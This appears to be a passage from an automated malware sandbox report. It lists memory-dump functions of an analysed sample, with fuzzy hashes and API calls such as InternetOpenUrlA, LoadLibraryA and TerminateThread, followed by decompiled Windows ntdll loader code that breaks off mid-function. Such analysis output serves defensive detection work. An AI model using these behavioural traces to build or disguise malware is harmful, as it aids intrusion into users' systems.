
                          Uniqueness Score: -1.00%

                          Function 1E189840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 574e6fd016595a4de53e7b40888e268c6d7e5ab9746667c10bf327c38823352e
                          • Instruction ID: 4f3e486d305dc65dc09493554079eee9bcb5c1005668c90e28e54250d70de14c
                          • Opcode Fuzzy Hash: 574e6fd016595a4de53e7b40888e268c6d7e5ab9746667c10bf327c38823352e
                          • Instruction Fuzzy Hash: 29900261242041525545B15A450450B400667E06817D1C116E1415910C8566AC96F671
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E189860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: d7ec32b9e31eee2f2ad7e428f04772e5e94de53b504b50391f6c51a3f52d2beb
                          • Instruction ID: fdf8e91928fd68a57cde3e474dee953da070d0f724ca5b6283cbdd04d7505586
                          • Opcode Fuzzy Hash: d7ec32b9e31eee2f2ad7e428f04772e5e94de53b504b50391f6c51a3f52d2beb
                          • Instruction Fuzzy Hash: 5290027120100413D111615A460470B000957D0681FD1C516E0425518D96969D92B171
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E1898F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2a3b3f8b578818abe06d1ccc1d219ede8d7c89026971cc519c05609edfc87b23
                          • Instruction ID: 18aab7046c7566f763db2758acc0eb95a08e1dbecaad424d792ee9ee9874c626
                          • Opcode Fuzzy Hash: 2a3b3f8b578818abe06d1ccc1d219ede8d7c89026971cc519c05609edfc87b23
                          • Instruction Fuzzy Hash: 3590026160100502D101715A450461A000A57D0681FD1C126E1025515ECA659DD2B171
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E189910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 17025930c198e16c552bb27e416e3bfaab7b058e3345a430971d321f5133a59d
                          • Instruction ID: 610dcf578b5dce555585f3a36f775c21e60101fa2eef2855d49cf084fed515aa
                          • Opcode Fuzzy Hash: 17025930c198e16c552bb27e416e3bfaab7b058e3345a430971d321f5133a59d
                          • Instruction Fuzzy Hash: B39002B120100402D140715A450474A000557D0741FD1C115E5065514E86999DD576B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E1899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f1201f7860857601537697d5f8e0847863abaebe138175f452f974e1dfdf589b
                          • Instruction ID: bd8ebbfe2332b185078a8446d8d89c3ff44207a6c31b09262e6f1fb9d4b5c428
                          • Opcode Fuzzy Hash: f1201f7860857601537697d5f8e0847863abaebe138175f452f974e1dfdf589b
                          • Instruction Fuzzy Hash: 009002A134100442D100615A4514B0A000597E1741FD1C119E1065514D8659DC927176
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00563065, Relevance: 3.1, APIs: 2, Instructions: 124networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenA.WININET(005636E3,00000000,00000000,00000000,00000000), ref: 00563075
                          • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563135
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InternetOpen
                          • String ID:
                          • API String ID: 2038078732-0
                          • Opcode ID: c232d9fc68feea7f1cf8b56284282e5b699399b4ae613a7065e6cccd1fc642c9
                          • Instruction ID: dac12c9a9ae887e79c8f9af19ecf1316250f77fb70d18f30a24d953da30a25ad
                          • Opcode Fuzzy Hash: c232d9fc68feea7f1cf8b56284282e5b699399b4ae613a7065e6cccd1fc642c9
                          • Instruction Fuzzy Hash: 2341D63024038BABEF315E64CD65BEE3B65BF41780F504429ED8AAB190EB71C644EA10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 005650F4, Relevance: 1.7, APIs: 1, Instructions: 192COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 820c01e398c8ac914f2f4dd100bcc53ff887bca8876c1ce3cc12604a767d318d
                          • Instruction ID: 284031e4e01c2a61d6dac293d96cb26dd2c49f2de43c40f8aa54d0728df2fa68
                          • Opcode Fuzzy Hash: 820c01e398c8ac914f2f4dd100bcc53ff887bca8876c1ce3cc12604a767d318d
                          • Instruction Fuzzy Hash: AA516A34685B17EAEB3135689C793E72EA1BF537A0FE40625ECC2475C1F32888C5CA42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00561F7E, Relevance: 1.6, APIs: 1, Instructions: 86threadCOMMON
                          Download Yara Rule
                          APIs
                          • TerminateThread.KERNELBASE(000000FE,00000000), ref: 00561F98
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: TerminateThread
                          • String ID:
                          • API String ID: 1852365436-0
                          • Opcode ID: e92dd91ca125e63e3076cd073202b9e0c2120dea8f5831548b7e065d1ee819e1
                          • Instruction ID: 9362829716a27943713430aa8279d4828737ef5ac0fb7575e33dee84383186f7
                          • Opcode Fuzzy Hash: e92dd91ca125e63e3076cd073202b9e0c2120dea8f5831548b7e065d1ee819e1
                          • Instruction Fuzzy Hash: F4216B70204B15AFDB306E6889E47EE3B99FF46360FB44626E942C71D1D3628CC1C922
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 005630A5, Relevance: 1.6, APIs: 1, Instructions: 83networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563135
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InternetOpen
                          • String ID:
                          • API String ID: 2038078732-0
                          • Opcode ID: feb18598b401ffec5788795f38330becb4956db7c97b57c4cc12237419fcc0f6
                          • Instruction ID: 5bfcc33e0aade4eb1fab1e46912cadbdadd3609270c3fb57f8864e2bd8a0a962
                          • Opcode Fuzzy Hash: feb18598b401ffec5788795f38330becb4956db7c97b57c4cc12237419fcc0f6
                          • Instruction Fuzzy Hash: 5521A77034034AABFB344E54CDA5BFB3BA8EF41780F504428EE8A9B190E770D644EA10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00565336, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f8160578b63f83e872e5b7f606f360f207e19262112eecf1df1a24175e0b2d09
                          • Instruction ID: a0e70adebb973af26b6e83d82e581841fce74e96d25916a71261fda643a6c8e1
                          • Opcode Fuzzy Hash: f8160578b63f83e872e5b7f606f360f207e19262112eecf1df1a24175e0b2d09
                          • Instruction Fuzzy Hash: C1117494A41256A8FF303A705CA5BF71E16BF52770FF40A26FD92970C1D359CC845A03
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 005646F9, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 952da18728ebe144b327b1e76ad01120048368fc77f65a97f3ddd1f7d23eecbc
                          • Instruction ID: b9eb9533471ed153f6da2d6216fb9051f8e5c571ab5df2c6bcd4f0bbce285221
                          • Opcode Fuzzy Hash: 952da18728ebe144b327b1e76ad01120048368fc77f65a97f3ddd1f7d23eecbc
                          • Instruction Fuzzy Hash: 01014954B11257ADFF3436B45D45BF71E56BFA27A0F98412AFC8283046D728CC855E43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00563119, Relevance: 1.6, APIs: 1, Instructions: 57networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563135
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InternetOpen
                          • String ID:
                          • API String ID: 2038078732-0
                          • Opcode ID: bc856a6568525b9a6ff4c3e149fc0a0c30de5ec47769609975933ccb673777b1
                          • Instruction ID: 92edebe767465642e7124a6f1e1000eb46b473a671534eedfc563668c48d986a
                          • Opcode Fuzzy Hash: bc856a6568525b9a6ff4c3e149fc0a0c30de5ec47769609975933ccb673777b1
                          • Instruction Fuzzy Hash: 9011567024038BABFB348E55CDA5FFB7B69EF41780F548428ED8A9B140E770D644EA24
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0056481A, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNELBASE(?,595014AD,?,005623F1,?,00000000,00000000,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 005648E9
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: e79ac11a7ea172bd05ac55158044cc142db0d91c817158d68eacd1ff2f2a1aed
                          • Instruction ID: 3be06d5c3c3b01c891a584ca2c791af91a11d44d5d70ccc39bb745968615ca3e
                          • Opcode Fuzzy Hash: e79ac11a7ea172bd05ac55158044cc142db0d91c817158d68eacd1ff2f2a1aed
                          • Instruction Fuzzy Hash: 2CF0F654A42256E8EF3036602C4ABFB1E59BF91360FE44522FC8193042C328C8885E43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00564835, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNELBASE(?,595014AD,?,005623F1,?,00000000,00000000,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 005648E9
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 2b9e6a41fd05225e4aaa53531420a76ff69fc221b9702e7bc46b208d47ddfb2f
                          • Instruction ID: fef9a6aad575836b486900a7726de665b1555734d3b1bbb70c8b9f92c4f028c2
                          • Opcode Fuzzy Hash: 2b9e6a41fd05225e4aaa53531420a76ff69fc221b9702e7bc46b208d47ddfb2f
                          • Instruction Fuzzy Hash: FBF02454A41246A9FF3037701D0A7FB1AA9BF90310FE48525FC81D7002D728C8840F07
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00564877, Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNELBASE(?,595014AD,?,005623F1,?,00000000,00000000,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 005648E9
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 8f9d8d9f4e7a368c85875c908b39264b3ed115b4f92ea2dc9bf63cb5483c7733
                          • Instruction ID: a3d736d584bff29abbf19e7ef033576cac90d5ab1d3ce8a156c731f775de6d9d
                          • Opcode Fuzzy Hash: 8f9d8d9f4e7a368c85875c908b39264b3ed115b4f92ea2dc9bf63cb5483c7733
                          • Instruction Fuzzy Hash: 07F0E544A51246EAEF303B745C4E7EB2A99BF55360FD85222FC94A7682D72CC8850F47
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 005648BD, Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNELBASE(?,595014AD,?,005623F1,?,00000000,00000000,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 005648E9
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 86d1ae167f1264ff4e123195bd4254e48aca8fff0e1bf20852924967b30914b6
                          • Instruction ID: 903a9b79b9a0f92fefab34c2f3f7bbb7644cceb48348301ec9a965895d9a22af
                          • Opcode Fuzzy Hash: 86d1ae167f1264ff4e123195bd4254e48aca8fff0e1bf20852924967b30914b6
                          • Instruction Fuzzy Hash: 94D02B14A8031BF35F203F701C0D7DF2A61AE44750BD48151FCC457505C734C4450E46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00562D7D, Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00562D17,00562DB4), ref: 00562D9F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 72377ccdd72571d04adc792edf7030eface8fb63f8d8763f2bcf66cff2b2072c
                          • Instruction ID: be21ac10a46487251ea4766ae79e9ebefdae682190105c2b5de3e35a789d3362
                          • Opcode Fuzzy Hash: 72377ccdd72571d04adc792edf7030eface8fb63f8d8763f2bcf66cff2b2072c
                          • Instruction Fuzzy Hash: 4DD0C974398304BAF9244920AD6BFD661175B92F84E90810DBF4D292C143E75951C516
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E18967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c4c162fe59043cf267a21465f19c467eb06bba916632ee1d27e92e324277e739
                          • Instruction ID: 54b09fc11be2cd638be21ef0793a16dafd5f72384b90bf42819669220951ce0e
                          • Opcode Fuzzy Hash: c4c162fe59043cf267a21465f19c467eb06bba916632ee1d27e92e324277e739
                          • Instruction Fuzzy Hash: C7B09BB19014C5C5D601D7614708B1B790177D0741FB6C155D1171641E4778D4D1F5B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 1E178E00, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126timeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 44%
                          			E1E178E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1e23d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1e238464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1e235780 & 0x00000003) != 0) {
							E1E1C5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1e235780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E1E18B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1e237984; // 0x8f2b20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1e238464; // 0x73b80110
					 *0x1e23b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E1E179B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1e235780 & 0x00000005) != 0) {
						_push(_t49);
						E1E1C5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                          0x1e178e0f
                          0x1e178e16
                          0x1e178e19
                          0x1e178e1b
                          0x1e178e21
                          0x1e178e7f
                          0x1e178e85
                          0x1e1b9354
                          0x1e1b936c
                          0x1e1b9371
                          0x1e1b937b
                          0x1e1b9381
                          0x1e1b9381
                          0x1e1b937b
                          0x1e178e9d
                          0x1e178e9d
                          0x1e178e29
                          0x1e178e2c
                          0x1e178e38
                          0x1e178e3e
                          0x1e178e43
                          0x1e178eb5
                          0x1e178eb9
                          0x1e1b92aa
                          0x1e1b92af
                          0x1e1b92e8
                          0x1e1b92e8
                          0x1e1b92af
                          0x1e178eb9
                          0x1e178e45
                          0x1e178e53
                          0x1e178e5b
                          0x1e178e5f
                          0x1e178e78
                          0x1e178e78
                          0x1e178e7d
                          0x1e178ec3
                          0x1e178ecd
                          0x1e178ed2
                          0x1e178ed2
                          0x1e178ec5
                          0x1e178ec5
                          0x00000000
                          0x1e178e7d
                          0x1e178e67
                          0x1e178ea4
                          0x1e1b931a
                          0x00000000
                          0x00000000
                          0x1e1b9320
                          0x1e178ea4
                          0x1e178e70
                          0x1e1b9325
                          0x1e1b9340
                          0x1e1b9345
                          0x1e1b9345
                          0x1e178e76
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          Strings
                          • minkernel\ntdll\ldrsnap.c, xrefs: 1E1B933B, 1E1B9367
                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E1B932A
                          • Querying the active activation context failed with status 0x%08lx, xrefs: 1E1B9357
                          • LdrpFindDllActivationContext, xrefs: 1E1B9331, 1E1B935D
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                          • API String ID: 3446177414-3779518884
                          • Opcode ID: 1cbf35496cfe57077847b958b72b1db845e4ac2050da268fcf4732358e84dc8c
                          • Instruction ID: 9f5b75e9bc79c88aca5368acc674f4ce53c5c9f1575c9eb43033bacf3c2b4a68
                          • Opcode Fuzzy Hash: 1cbf35496cfe57077847b958b72b1db845e4ac2050da268fcf4732358e84dc8c
                          • Instruction Fuzzy Hash: 20411832E103769FD711AA18CD98A66F6B7BB04BC4F264769EC0897191EF706DC08791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E21E824, Relevance: 6.5, APIs: 4, Instructions: 493timeCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 50%
                          			E1E21E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x1e23d360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L1E16FAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E1E16FA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x1e23b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E1E162280(E1E18F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E1E15FFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x1e23b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E1E18B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E1E17F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x1e23b1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x1e23b1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
